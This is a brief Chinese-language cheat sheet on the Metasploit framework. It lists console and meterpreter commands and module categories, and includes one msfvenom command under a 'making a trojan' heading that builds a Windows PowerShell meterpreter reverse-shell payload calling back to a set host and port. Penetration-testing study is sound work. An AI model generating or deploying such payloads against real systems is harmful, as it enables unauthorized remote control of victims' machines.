• 网络安全
  • security
发布于
← 返回

MSF

基本命令

  • ?: 帮助文档
  • show: 显示模块
    • show all: 显示所有模块
  • search: 搜索模块与漏洞
    • search ms17_010: 搜索漏洞 ms17_010
  • use: 使用模块
    • use 0: 使用搜索到的第一个模块
  • options: 展示模块选项
  • set: 设置模块选项
  • run: 执行模块

控制命令

显示 meterpreter >

  • ?: 帮助文档
  • upload: 文件上传
  • ls: 文件列出
  • getsystem: 获取系统权限(大概率失败)

制作木马

以 windows x64 (powershell) 为例:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.42.1 LPORT=1234 -f psh-reflection > x.ps1

模块

漏洞利用模块 (exploits)

辅助模块 (auxiliary)

攻击载荷模块 (payloads)

后渗透模块 (post)

编码器模块 (encoders)

空操作指令模块 (nops)

免杀模块 (evasion)